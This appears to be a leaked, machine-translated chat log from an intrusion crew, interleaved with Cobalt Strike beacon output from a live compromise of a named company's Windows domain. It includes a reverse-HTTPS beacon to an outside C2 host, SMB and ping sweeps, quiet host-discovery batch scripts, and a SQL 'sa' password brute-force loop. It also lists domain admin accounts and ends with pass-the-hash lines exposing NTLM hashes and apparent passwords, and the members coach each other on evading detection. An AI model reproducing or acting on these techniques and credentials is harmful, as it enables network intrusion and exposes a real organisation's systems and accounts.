beacon> spawnas loomisco.com\EDIADMIN APPSYS https
[*] Tasked beacon to spawn windows/beacon_https/reverse_https (oldplex.com:443) as loomisco.com\EDIADMIN
[+] host called home, sent: 261169 bytes
[-] could not run C:\Windows\system32\mstsc.exe as loomisco.com\EDIADMIN: 5
How do you spawn? No process YES, under it does not spawn works, does not work etc. I am waiting for some kind of a fitbaby guys, let's not be silent) not through make_token, but the full process from the domain admin process as above throw in a separate message host - OS and so on then full log files from the domain admin context run sharefinder until scanned in this form `` ``
192.168.0.1:445 (platform: 500 version: 6.3 name: WYOMISSING_EX1 domain: LOOMIS)
192.168.0.2:445 (platform: 500 version: 10.0 name: BRIGHTHEALTHSTA domain: LOOMIS)
192.168.0.5:445 (platform: 500 version: 5.0 name: IMAGING3 domain: LOOMIS)
192.168.0.25:445 (platform: 500 version: 6.2 name: LOOMISBENSQL01 domain: LOOMIS)
192.168.0.29:445 (platform: 500 version: 6.1 name: MDIETRICH domain: LOOMIS)

[+] received output:
192.168.0.43:445
192.168.0.45:445 (platform: 500 version: 6.1 name: EOBSTORAGE domain: LOOMIS)
192.168.0.57:445 (platform: 500 version: 6.1 name: LOOMISGT2 domain: LOOMIS)
192.168.0.68:445
192.168.0.69:445 (platform: 500 version: 6.1 name: LDSWYO21 domain: LOOMIS)
192.168.0.70:445
192.168.0.75:445 (platform: 500 version: 6.2 name: LOOMISBENSQL01 domain: LOOMIS)
192.168.0.83:445 (platform: 500 version: 6.1 name: LOOMISFAXR01 domain: LOOMIS)
192.168.0.86:445 (platform: 500 version: 10.0 name: JGUSS domain: LOOMIS)
192.168.0.91:445 (platform: 500 version: 10.0 name: TLCAUTOTF2 domain: LOOMIS)
192.168.0.97:445 (platform: 500 version: 10.0 name: DSCHAFFER domain: LOOMIS)
192.168.0.100:445 (platform: 500 version: 6.2 name: EPICAPM domain: LOOMIS)
192.168.0.107:445 (platform: 500 version: 6.1 name: JGUSSW7A domain: LOOMIS)
192.168.0.109:445 (platform: 500 version: 10.0 name: TLCSOPHOS domain: LOOMIS)
192.168.0.115:445 (platform: 500 version: 10.0 name: LOOMISINDIODB01 domain: LOOMIS)
192.168.0.116:445 (platform: 500 version: 6.1 name: WINDOWS7EXCEL domain: LOOMIS)
192.168.0.119:445 (platform: 500 version: 6.1 name: DSCHAFFER2 domain: LOOMIS)
192.168.0.127:445 (platform: 500 version: 6.1 name: KBRETON domain: LOOMIS)
192.168.0.135:445 (platform: 500 version: 6.1 name: LOOMISFAXR02 domain: LOOMIS)
192.168.0.183:445 (platform: 500 version: 6.3 name: VEEAMBACKUPS domain: LOOMIS)
192.168.0.184:445 (platform: 500 version: 10.0 name: IHCANSTATS1 domain: LOOMIS)
192.168.0.185:445 (platform: 500 version: 6.2 name: TLCANALYTICS1 domain: LOOMIS)
192.168.0.186:445 (platform: 500 version: 6.3 name: TLCMONITORING domain: LOOMIS)
192.168.0.188:445
192.168.0.189:445 (platform: 500 version: 10.0 name: INNOSTATS1 domain: LOOMIS)
192.168.0.191:445 (platform: 500 version: 6.1 name: TERMSRV domain: LOOMIS)
192.168.0.192:445 (platform: 500 version: 10.0 name: TLCDC1 domain: LOOMIS)
192.168.0.193:445 (platform: 500 version: 6.1 name: TERMSRV1 domain: LOOMIS)
192.168.0.194:445 (platform: 500 version: 10.0 name: ELIGSTATS1 domain: LOOMIS)
192.168.0.195:445 (platform: 500 version: 6.1 name: TRAVELER1 domain: LOOMIS)
192.168.0.196:445 (platform: 500 version: 6.1 name: IMAGING2-NEW domain: LOOMIS)
192.168.0.197:445 (platform: 500 version: 6.2 name: WEBCHAT domain: LOOMIS)
192.168.0.200:445
192.168.0.202:445 (platform: 500 version: 10.0 name: TLCSTORAGE1 domain: LOOMIS)
192.168.0.204:445 (platform: 500 version: 10.0 name: TLCAUTOTFR domain: LOOMIS)
192.168.0.205:445 (platform: 500 version: 10.0 name: PDFSTORAGE domain: LOOMIS)
192.168.0.214:445 (platform: 500 version: 6.1 name: TERMSRV5 domain: LOOMIS)
192.168.0.215:445 (platform: 500 version: 10.0 name: PDFSTORAGE domain: LOOMIS)
192.168.0.222:445 (platform: 500 version: 10.0 name: TLCDC2 domain: LOOMIS)
192.168.0.223:445 (platform: 500 version: 10.0 name: PDFSTORAGE domain: LOOMIS)
192.168.0.224:445 (platform: 500 version: 5.0 name: OCR1 domain: WORKGROUP)
192.168.0.231:445 (platform: 500 version: 10.0 name: TLCEPICAS01 domain: LOOMIS)
192.168.0.232:445 (platform: 500 version: 10.0 name: TLCEPICCS01 domain: LOOMIS)
192.168.0.233:445 (platform: 500 version: 10.0 name: TLCEPICDB01 domain: LOOMIS)
192.168.0.239:445 (platform: 500 version: 10.0 name: TLCSQLDB1 domain: LOOMIS)
192.168.0.242:445 (platform: 500 version: 10.0 name: TLCSKLM2 domain: LOOMIS)
192.168.0.247:445 (platform: 500 version: 10.0 name: TLCRDSLIC1 domain: LOOMIS)
192.168.0.248:445 (platform: 500 version: 5.0 name: METAFILE domain: LOOMIS)
192.168.0.249:445 (platform: 500 version: 6.1 name: SCANSTORAGE domain: LOOMIS)
192.168.0.250:445 (platform: 500 version: 10.0 name: TLCSKLM1 domain: LOOMIS)
192.168.0.252:445 (platform: 500 version: 6.1 name: STORAGE domain: LOOMIS)
``````
beacon> portscan 192.168.3.0/24 445 icmp 1024
[*] Tasked beacon to scan ports 445 on 192.168.3.0/24
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '192.168.3.3' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.13' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.18' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.15' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.23' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.31' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.25' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.28' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.2' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.0' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.1' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.32' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.33' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.41' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.37' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.38' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.39' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.40' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.42' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.47' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.46' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '192.168.3.55' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.53' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.77' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.98' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.99' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.94' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '192.168.3.241' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.242' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '192.168.3.245' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.244' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.248' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.249' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.247' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.252' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.253' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.255' is alive. [read 8 bytes]

[+] received output:
192.168.3.3:445 (platform: 500 version: 10.0 name: SUPPACCSTATS1 domain: LOOMIS)
192.168.3.18:445 (platform: 500 version: 6.1 name: SCALA1 domain: LOOMIS)
192.168.3.31:445 (platform: 500 version: 10.0 name: ESSEXO365 domain: LOOMIS)
192.168.3.32:445 (platform: 500 version: 10.0 name: SVALLON domain: LOOMIS)
192.168.3.41:445 (platform: 500 version: 6.0 name: PRINTSRV08 domain: LOOMIS)
192.168.3.55:445 (platform: 500 version: 10.0 name: TLCEPICCSR24 domain: LOOMIS)
192.168.3.94:445 (platform: 500 version: 10.0 name: MMALONEY domain: LOOMIS)
192.168.3.98:445 (platform: 500 version: 10.0 name: CPETERS domain: LOOMIS)
192.168.3.99:445 (platform: 500 version: 10.0 name: AFOLK2 domain: LOOMIS)
192.168.3.244:445 (platform: 500 version: 10.0 name: FSITRACK domain: LOOMIS)
192.168.3.245:445 (platform: 500 version: 10.0 name: TLCEPICIIS1 domain: LOOMIS)
192.168.3.247:445 (platform: 500 version: 10.0 name: COMMISSIONSTAT domain: LOOMIS)
192.168.3.248:445 (platform: 500 version: 10.0 name: PRINTSRV16 domain: LOOMIS)

[+] received output:
192.168.3.252:445 (platform: 500 version: 10.0 name: TLCEPICFAX domain: LOOMIS)
Scanner module is complete

``While the scanning is going on, if everything is clear, I thought there would be a question why) no questions about it no? yes ``portscan 192.168.0.0/24 445 icmp 1024` the result here all four at once I start or wait until each works? and run in turn at the end add `icmp 1024 `portscan 192.168.0.0/24 445[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=jhx6mHCdctixMbnBK) before scanning the ports the command here192.186.1.0/24 not the experience of using the utility ping?) stop[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=jhx6mHCdctixMbnBK) port scan to smb ports let's go ahead and agree that the work on the task min 10command ping, do sysadmins need to discuss this?
192.168.8.0/24
10.10.10.0/24
``the sticking point is, we do something, we can't do it, we ask you, all you give us is leading questions and vague answers like @user8 please make a list of subnets192.168.820 * 70 min100 / 5 = 2010.10.10.0 ping 5% of the workload for today`` ``
192.168.0.0/24
192.168.3.0/24
10.10.10.0/24
192.168.8.0/24
just let's do the math:waiting for the subnets who knows not to go to the darwin prize go to /24 mask70 minutes per ping this is a new record)fuck why do i have to repeat it twice? less than half of them removed``
mstsc.exe 4840 Services 0 13,640 K Unknown NT AUTHORITY\SYSTEM 0:03:30 N/A
mstsc.exe 4304 Services 0 61,060 K Unknown NT AUTHORITY\SYSTEM 0:51:19 N/A
mstsc.exe 5868 Console 3 3,052 K Unknown SCANSTORAGE\Administrator 0:00:00 N/A
mstsc.exe 5564 Console 3 3,016 K Unknown SCANSTORAGE\Administrator 0:00:00 N/A
mstsc.exe 3056 Services 0 12,480 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
mstsc.exe 3188 Services 0 12,216 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 4996 Services 0 12,944 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 2420 Services 0 20,184 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 3388 Services 0 14,380 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 1176 Services 0 12,052 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
mstsc.exe 1152 Services 0 11,964 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A

[+] received output:
mstsc.exe 4840 Services 0 13,608 K Unknown NT AUTHORITY\SYSTEM 0:03:30 N/A
mstsc.exe 4304 Services 0 61,060 K Unknown NT AUTHORITY\SYSTEM 0:51:19 N/A
mstsc.exe 5868 Console 3 3,052 K Unknown SCANSTORAGE\Administrator 0:00:00 N/A
mstsc.exe 5564 Console 3 3,016 K Unknown SCANSTORAGE\Administrator 0:00:00 N/A
mstsc.exe 3056 Services 0 12,480 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
mstsc.exe 3188 Services 0 12,384 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 4996 Services 0 13,200 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
``27-52second half of the hosts will arrive when the pings are done? it's been an hourI seeIt's been an hourIs this not a problem either? @user1 @user3 where is local control in groups? it's total anarchy leave yourself two sessions and sit in single sessionscall his pc to reboot and do not even think to jump in winlogonI would open tasklist as an advanced user would see something wrong```
[+] received output:
mstsc.exe 4840 Services 0 13,640 K Unknown NT AUTHORITY\SYSTEM 0:03:30 N/A
mstsc.exe 4304 Services 0 61,060 K Unknown NT AUTHORITY\SYSTEM 0:51:19 N/A
mstsc.exe 5868 Console 3 3,052 K Unknown SCANSTORAGE\Administrator 0:00:00 N/A
mstsc.exe 5564 Console 3 3,016 K Unknown SCANSTORAGE\Administrator 0:00:00 N/A
mstsc.exe 3056 Services 0 12,480 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
mstsc.exe 3188 Services 0 12,216 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 4996 Services 0 12,944 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 2420 Services 0 20,184 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 3388 Services 0 14,380 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 1176 Services 0 12,052 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
mstsc.exe 1152 Services 0 11,964 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
``Work quietly I'll open the process sheet and delete all mstsc that I find and also needhost with this approach is the ip address written? or just the host - active? I know it's late.... but
```
$job = foreach($line in (Get-Content hostlist.txt)){


	if(Test-Connection -ComputerName $line -Count 1 -Quiet ){


		 Start-Sleep -s 3
	
		Write-Warning $line

		Write-output "$line - Active"
	}

}
$job | out-file alive.txt -Append
``I hope you're not scanning hosts 2-3 times, it's not funny, you're scanning 4 times too ``.
Pinging FSITrack.loomisco.com [192.168.3.244] with 32 bytes of data:
Reply from 192.168.3.244: bytes=32 time<1ms TTL=127
Reply from 192.168.3.244: bytes=32 time<1ms TTL=127
Reply from 192.168.3.244: bytes=32 time<1ms TTL=127
Reply from 192.168.3.244: bytes=32 time<1ms TTL=127

Ping statistics for 192.168.3.244:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

beacon> shell ping PDFStorage.loomisco.com
[*] Tasked beacon to run: ping PDFStorage.loomisco.com
beacon> sleep 3
[*] Tasked beacon to sleep for 3s
[+] host called home, sent: 75 bytes
[+] received output:

Pinging PDFStorage.loomisco.com [192.168.0.223] with 32 bytes of data:
Reply from 192.168.0.223: bytes=32 time<1ms TTL=128
Reply from 192.168.0.223: bytes=32 time<1ms TTL=128
Reply from 192.168.0.223: bytes=32 time<1ms TTL=128
Reply from 192.168.0.223: bytes=32 time<1ms TTL=128

Ping statistics for 192.168.0.223:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

beacon> shell ping TLCSophos.loomisco.com
[*] Tasked beacon to run: ping TLCSophos.loomisco.com
beacon> sleep 3
[*] Tasked beacon to sleep for 3s
[+] host called home, sent: 74 bytes
[+] received output:

Pinging TLCSophos.loomisco.com [192.168.0.109] with 32 bytes of data:
Reply from 192.168.0.109: bytes=32 time<1ms TTL=128
Reply from 192.168.0.109: bytes=32 time<1ms TTL=128
Reply from 192.168.0.109: bytes=32 time<1ms TTL=128
Reply from 192.168.0.109: bytes=32 time<1ms TTL=128
``[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=K3mdi2PTiY8vpHpy2) no, the question was to the point about the startup prioritiesrights look out for each other after all there are 6 people around you guys well honestly asked to keep it down, immediately removed `-n````
user 2-2 beacon> shell ping TLCBENTS02.loomisco.com
[*] Tasked beacon to run: ping TLCBENTS02.loomisco.com
[+] host called home, sent: 59 bytes
[+] received output:

Pinging TLCBENTS02.loomisco.com [192.168.8.166] with 32 bytes of data:
Reply from 192.168.8.166: bytes=32 time<1ms TTL=127
Reply from 192.168.8.166: bytes=32 time<1ms TTL=127
Reply from 192.168.8.166: bytes=32 time<1ms TTL=127
Reply from 192.168.8.166: bytes=32 time<1ms TTL=127

Ping statistics for 192.168.8.166:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

user 2-2 beacon> shell ping TLCBENTS01.loomisco.com
[*] Tasked beacon to run: ping TLCBENTS01.loomisco.com
[+] host called home, sent: 59 bytes
[+] received output:

Pinging TLCBENTS01.loomisco.com [192.168.8.165] with 32 bytes of data:
Reply from 192.168.8.165: bytes=32 time<1ms TTL=127
Reply from 192.168.8.165: bytes=32 time<1ms TTL=127
Reply from 192.168.8.165: bytes=32 time<1ms TTL=127
Reply from 192.168.8.165: bytes=32 time<1ms TTL=127

Ping statistics for 192.168.8.165:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

``[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=LbakdpdgYJKJn4bko) setlocal enabledelayedexpansion ?in an hour you can ping by hand pinging by hand, just sit on it for an hour[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=fodiBryiBJgkXd4bQ) anyone thought that if you catch an error in the console, it is logged somewhere on the server, or even some alert user I asked to do it quietly ping from every session run from all cobv file the same output is you from two cobv ping?in bicon the error is pinged above there was a check you also do not agree with each other with the same error i asked 2 hosts to check it has not changedchfile i can not see the file went to 692 that's why i asked to throw the command -output3388 not all sessions i see there and run the file i have `C:\Users\pgo.bat` and inside the batting you have a relative path to ping How do you think it will run?) you are in `C:\windows\system32\ping.exe` lying in `C:\ProgramData\ping.bat`, you are in `C:\ProgramData` and run `ping` and has anyone thought about prioritization? specifically about the rat, remember I asked you about environment variables i *please ping 50 hosts as quietly and automatically as possible*
the rest of you: i'll do it!
@echo off
for /f %%i in (HOSTLIST.TXT) do (
	timeout /T 3 /nobreak
	ping %%i -n 1 -4 >> pingedhosts.txt
)
```
with this I do not understand what the problem is, yes the error, but the ping is passed, in the outfile is infarugaetsya not correctly assembled (again you poke everything in a row? What kind of house you have there `` ``
ss cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another
``I've dropped the priority of the ping to jump to the system processes-now the mstsc processes-is the second command cobu)))))))))))))-4?)``I -n 1 -4 ``I guess it's counting down from -4 where it's coming from``.
@echo off
for /f %%i in (HOSTLIST.TXT) do (
	timeout /T 3 /nobreak
	ping %%i -n 1 -4 >> pingedhosts.txt
)
``[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=8A5NSvowpz8DTiZyC) and this?[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=Eafe28tzoKDPJnPuC) is a sbatnik in the studio
beacon> shell pgo.bat
[*] Tasked beacon to run: pgo.bat
[+] host called home, sent: 38 bytes
[+] received output:
ERROR: Input redirection is not supported, exiting the process immediately.
ERROR: Input redirection is not supported, exiting the process immediately.

``````
Pinging LDSWYO21.loomisco.com [192.168.0.69] with 32 bytes of data:
Reply from 192.168.0.69: bytes=32 time<1ms TTL=128

Ping statistics for 192.168.0.69:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

Pinging LOOMISGT2.loomisco.com [192.168.0.57] with 32 bytes of data:
Reply from 192.168.0.57: bytes=32 time<1ms TTL=128

Ping statistics for 192.168.0.57:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
``[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=KZBs8hMCv5QE3PZA9) I wrote ``fix`` and remove loop 1 and `echo %s:%p >> result.txt`` on timeoutwas a batkin, you should have fixed it in matches and just replace osql with ping
for /f %s in (srv.txt) do @ (for /f %p in (pwd.txt) do @ osql -S %s -U sa -P %p -Q "select @@servername" >> result.txt && echo %s:%p >> result.txt)
Write @@echo off in the beginning.
1>>
``Output file
```

Pinging LDSWYO21.loomisco.com [192.168.0.69] with 32 bytes of data:
Reply from 192.168.0.69: bytes=32 time<1ms TTL=128

Ping statistics for 192.168.0.69:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

Pinging LOOMISGT2.loomisco.com [192.168.0.57] with 32 bytes of data:
Reply from 192.168.0.57: bytes=32 time<1ms TTL=128

Ping statistics for 192.168.0.57:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

The ``Batnick'' error
```
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
``````
beacon> shell pingtimeout.bat
[*] Tasked beacon to run: pingtimeout.bat
[+] host called home, sent: 46 bytes
[+] received output:

C:\users>for /F %i in (HOSTLIST.TXT) do (
timeout /T 3 /nobreak
 ping %i -n 1 -4 1>>pingedhosts.txt
)

C:\users>(
timeout /T 3 /nobreak
 ping LDSWYO21.loomisco.com -n 1 -4 1>>pingedhosts.txt
)
ERROR: Input redirection is not supported, exiting the process immediately.

C:\users>(
timeout /T 3 /nobreak
 ping LOOMISGT2.loomisco.com -n 1 -4 1>>pingedhosts.txt
)
ERROR: Input redirection is not supported, exiting the process immediately.

``you yourself are delaying progressIt only 5% of the workload today ping test takes forever so what?[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=iKbynXiLskqyPYerZ) and what is the problem here? at most googlelladno at least yandex did not ping) under the vpn? on the dedicec....6 minutes to throw a batnick, a file with 2 hosts and run? why so long? on 2 hosts first check the total report formdanet, at the stage of post ping already determine the interesting hosts or not in the cycle, ping - slip just asked the guys write batnickrukami whether you ping?I'm not talking about batnick in the context of batshchkomand slip even exists? again do not think? if you do it by hand, after each ping write sleep 3? what? also search the file and substitute a string in the ping command + slipda you had a batnick on almost similar actions) add there slip, which was thrown on the forum? batnick to ping this list at intervals of 3 sekotlichnoe` ``
TLCDC2.loomisco.com
TLCDC1.loomisco.com
Termsrv5.loomisco.com
TERMSRV.loomisco.com
TermsrvVendors.loomisco.com
loomisgw2.loomisco.com
LOOMISBENSQL01.loomisco.com
STORAGE.loomisco.com
IMAGING2-NEW.loomisco.com
Traveler1.loomisco.com
WebChat.loomisco.com
TLCWEBP1.loomisco.com
TLCWEBT1.loomisco.com
MITELWINSERVER.loomisco.com
Wyomissing_Ex1.loomisco.com
Printsrv08.loomisco.com
VeeamBackups.loomisco.com
EobStorage.loomisco.com
LOOMISFAXR01.loomisco.com
TLCMONITORING.loomisco.com
loomiswebsrv4.loomisco.com
TLCWebP2.loomisco.com
ScanStorage.loomisco.com
FSITrack.loomisco.com
PDFStorage.loomisco.com
TLCSophos.loomisco.com
TLCSKLM1.loomisco.com
TLCSKLM2.loomisco.com
LoomisIndioDB01.loomisco.com
Printsrv16.loomisco.com
LOOMISFAXR02.loomisco.com
TLCStorage1.loomisco.com
TLCAutoTFR.loomisco.com
Loomissftp1.loomisco.com
EpicAPM.loomisco.com
loomisgwdb2.loomisco.com
Metafile-vm1.loomisco.com
TLCANALYTICS1.loomisco.com
LDSWYO21.loomisco.com
LOOMISGT2.loomisco.com
TLCEPICAS01.loomisco.com
TERMSRV1.loomisco.com
TLCAutoTF2.loomisco.com
TLCEPICCS01.loomisco.com
TLCEPICDB01.loomisco.com
TLCEPICTS01.loomisco.com
TLCEPICTS02.loomisco.com
TLCRDSLIC1.loomisco.com
TLCSQLDB1.loomisco.com
TLCEPICIIS1.loomisco.com
TLCBENTS01.loomisco.com
TLCBENTS02.loomisco.com
Do not run the ping list binary on all servers here with a mass ping, reduce the amount of traffic and make one ping per hostdefault 4 pings per hostname do not need to do as usual ping hostname.com total 53 names * 3 sec = 150 sec for the entire ping serverov exactly after 1 ping slip 2-3 sec ping neatly now, take a list of their hostname[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=7SSFbhM9RHsppthN4) this is further15telno53 server OS in the domainvnimatelno, this DK question what?
Server Name IP Address
 ----------- ----------
 TLCDC1 192.168.0.192
 TLCDC2 192.168.0.222
``How many servers in the domain?) ahead of eedr,av1) look for trusts, if there is a need to get into each of themdetermine the scale + as you go along write yourself a plan and designate the steps of the other, just on the netmask continue to look for configurations of ipn or something else ?runningvslo, announced then take on personal koba who in the general does not fly, or dll, well, you know the methods you know not spawn sessions still, we have no minute, let's go, all downloaded and opened a sessiongoodgolove not do 20 sessions in the koba if you want you can work on the general koba for the team, or on their own personal go heretofore, to be in front of my eyes took from here AD info and stuff yeah, now only scanstreege does not hang forwarda did you have a lot of them?user4user8user3 pass the session to the first group
https://sky-vcenter65.skytech1.local/websso/SAML2/SSOSSL?RelyingPartyEntityId=aHR0cHM6Ly9za3ktdmNlbnRlcjY1L3ZzcGhlcmUtY2xpZW50L3NhbWwvd2Vic3NvL21ldGFkYXRhlacol.1hcetyks.56retnecv-yks
```
```
 https://sky-vcenter65.skytech1.local/websso/SAML2/SSO/vsphere.local?SAMLRequest=zVRbb5swFH7fr0B%2BBwMhl1olVdasWqV2zUo2TXuZHHOSWAOb%2BRhI%2F%2F0MSbasaqs87hE45zvfTVxe7crCa8Cg1ColURASD5TQuVSblHxZ3vgTcjV9d4m8LCo2q%2B1WPcKvGtB6M0Qw1q1da4V1CSYD00gBtyqHXUoc0NyNScVtD721tkJGKf588hsByoIZDQP3ZEFso6DQghe0hRWiptns%2Fi6mWfZAG6y2YGD%2FmXg32gjoWaRkzQsE4t3OU%2FIjGa34IOTrZDQOxzDkwyHk6%2FHkYpxMRsk6FG4MFxxRNvB3EbF2ZNFyZVMSh9GFH478aLgMYxZGbBAFkzD8TryF0VYLXbyXau9KbRTTHCUyxUtAZgXrCLM4CNlqP4Ts43K58BcP2bIHaGQO5pObTsk%2F%2BlmSDIj39Wh%2F3NnvAlHIesPfvlUdiJHpIZ5ekTkfgB8TJNMX06G1pB3MMZYSLM%2B55Zf09N7%2BelyxTt%2FtfKELKZ68WVHo9toAt06zNTX04ZXcvk2peyNzf92PsqozBq2jQ7xs0eF%2Frnkh1xLMK4V6jfKprfG5vtKDNOYansvOKDyFOdvc5ygHkMat7GU4FU3ZctdzoUuKYgslR8qtNX4PTF07Yxom9MPOmdF1BY%2BCdij%2FYLRtG7SDQJuNWwgj%2Bu3%2BLuuxfNnXXLgQ3DyzT5ULpTvPHkFBy1cFLN27FwT%2FR1TnUMDmlCp9Hs70WMzT%2F9T0Nw%3D%3D&SigAlg=http%3A%2F%2Fwww.w3.org%2F2001%2F04%2Fxmldsig-more%23rsa-sha256&Signature=eRWAEo1neECMdgPBw4japogtN7ytgmx1WzNL0VGEaYILRx3sY3nsk0rPEnd5C2p8HFEdQoGid8aNA9dpZUHnuez%2F
``sphere didn't find
no passwords saved anywhere,
go there from two DAs, their cars are not in the help3nets all ready?
Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
$DUPLICATE-2119 ABT ABT_NOC
bbesadmin BESAdmin ccg
ChuckM DP.Admin dpmonitoring
dtake hcohn justinladmin
kton lvetula mech.admin
mmiller pcsupport ppad
ppope printer RIVERBED
scadmin skyadmin
The command completed successfully.


[+] received output:
Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
ABT DP.Admin dpmonitoring
lvetula skyadmin vmtaccess - pass !scheduler!                
The command completed successfully.


pth SKYTECH1.LOCAL\bbesadmin b7e996a9282b045b181ab26ba27f6242 $uperm@n
pth SKYTECH1.LOCAL\ChuckM 357f64ecfb2e984a0357ebe783a67b5d C@mion60%
